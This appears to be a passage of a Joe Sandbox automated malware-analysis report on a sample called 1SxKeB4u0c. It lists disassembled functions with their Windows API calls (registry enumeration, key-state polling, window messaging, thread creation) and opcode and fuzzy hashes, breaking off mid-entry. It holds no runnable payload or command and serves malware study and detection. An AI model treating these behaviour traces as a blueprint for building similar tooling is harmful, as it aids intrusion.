                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                              • String ID:
                                                                              • API String ID: 2364364464-0
                                                                              • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                              • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                                                                              • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                              • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                                                                              Function 0042541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                              • String ID:
                                                                              • API String ID: 1559183368-0
                                                                              • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                              • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                                                                              • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                              • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                                                                              Function 00480037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                              • String ID:
                                                                              • API String ID: 3440857362-0
                                                                              • Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                                              • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                                                                              • Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                                              • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                                                                              Function 0046E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 1389676194-0
                                                                              • Opcode ID: 10ab2eeef8adcc44359a8ee01b2fef8424208ef58ee2c6d12ded2a6122cd55a8
                                                                              • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                                                                              • Opcode Fuzzy Hash: 10ab2eeef8adcc44359a8ee01b2fef8424208ef58ee2c6d12ded2a6122cd55a8
                                                                              • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                                                                              Function 0048A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                              • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                                                                              • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                              • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                                                                              Function 00402344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 00402357
                                                                              • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                              • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                              • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                              • String ID:
                                                                              • API String ID: 4210589936-0
                                                                              • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                              • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                                                                              • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                              • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                                                                              Function 004563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                                                                              • TranslateMessage.USER32(?), ref: 0045645C
                                                                              • DispatchMessageW.USER32(?), ref: 00456466
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                              • String ID:
                                                                              • API String ID: 2108273632-0
                                                                              • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                              • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                                                                              • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                              • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                                                                              Function 00458A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00458A30
                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleep$RectWindow
                                                                              • String ID:
                                                                              • API String ID: 3382505437-0
                                                                              • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                              • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                                                                              • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                              • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                                                                              Function 0045B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 0045B204
                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                                                                              • _wcsstr.LIBCMT ref: 0045B289
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                              • String ID:
                                                                              • API String ID: 3902887630-0
                                                                              • Opcode ID: 7c40135c3822cb45ac7c15643312732e8ceefee4f86ea2214e9f9867610103ed
                                                                              • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                                                                              • Opcode Fuzzy Hash: 7c40135c3822cb45ac7c15643312732e8ceefee4f86ea2214e9f9867610103ed
                                                                              • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                                                                              Function 0048B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                                                                              • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 2294984445-0
                                                                              • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                              • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                                                                              • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                              • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                                                                              Function 00459307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                                                                              • __itow.LIBCMT ref: 0045936A
                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                                                                              • __itow.LIBCMT ref: 004593A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow$_memmove
                                                                              • String ID:
                                                                              • API String ID: 2983881199-0
                                                                              • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                                              • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                                                                              • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                                              • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                                                                              Function 004012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                                              • SelectObject.GDI32(?,00000000), ref: 0040135C
                                                                              • BeginPath.GDI32(?), ref: 00401373
                                                                              • SelectObject.GDI32(?,00000000), ref: 0040139C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                              • String ID:
                                                                              • API String ID: 3225163088-0
                                                                              • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                                              • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                                                                              • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                                              • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                                                                              Function 00464A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                                                                              • __beginthreadex.LIBCMT ref: 00464AD8
                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                              • String ID:
                                                                              • API String ID: 3824534824-0
                                                                              • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                              • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                                                                              • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                              • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                                                                              Function 02F518DF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000008,?,?,02F515D8,02F53CBB,?,02F51D2A,?,?,00000000), ref: 02F518E4
                                                                              • _free.LIBCMT ref: 02F51919
                                                                              • _free.LIBCMT ref: 02F51940
                                                                              • SetLastError.KERNEL32(00000000,?,02F51D2A,?,?,00000000), ref: 02F5194D
                                                                              • SetLastError.KERNEL32(00000000,?,02F51D2A,?,?,00000000), ref: 02F51956
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$_free
                                                                              • String ID:
                                                                              • API String ID: 3170660625-0
                                                                              • Opcode ID: 9488a443e0fcacb1a4171f91521b489e4e8094dddd9f5db3099dd73b2bc505c4
                                                                              • Instruction ID: d9135a9416f6454a4c7df7d763b15927a569ba81bbdd412c73c9e9ed24278ec4
                                                                              • Opcode Fuzzy Hash: 9488a443e0fcacb1a4171f91521b489e4e8094dddd9f5db3099dd73b2bc505c4
                                                                              • Instruction Fuzzy Hash: 77012137A456352BA31226746C98B2B3A1E9FC67F47110629FF1EA2241FB6198228860
                                                                              Function 00458202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                                                                              • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                                                                              • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                                                                              Memory Dump Source
